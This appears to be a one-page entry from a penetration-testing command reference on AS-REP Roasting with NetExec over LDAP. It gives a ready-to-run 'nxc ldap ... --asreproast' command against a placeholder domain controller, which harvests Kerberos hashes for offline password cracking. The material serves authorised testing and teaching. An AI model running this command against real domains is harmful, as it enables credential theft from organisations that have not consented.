.. / NetExec-LDAP-ASREPRoasting
Star

NetExec (formerly CrackMapExec) performs an AS-REP Roasting attack via the LDAP service. This command attempts to enumerate domain accounts that do not require pre-authentication and requests Kerberos AS-REP responses for them. The extracted encrypted ticket-granting ticket (TGT) hashes are saved into the specified file and can later be cracked offline to recover plaintext credentials.

Command Reference:

Target IP: 10.10.10.1
Domain: test.local
Username List: users.txt
Password: (empty string)
Output File: output.txt

Command:

nxc ldap 10.10.10.1 -u users.txt -p '' --asreproast output.txt

References:

https://github.com/Pennyw0rth/NetExec

https://attack.mitre.org/techniques/T1558/004/

.. / NetExec-LDAP-ASREPRoasting Star if(localStorage["style"]=="true"){ document.getElementById('pagestyle').setAttribute('href','/assets/styleDark.css'); document.querySelector('input[type="checkbox"]').checked = true }

.. / NetExec-LDAP-ASREPRoasting
Star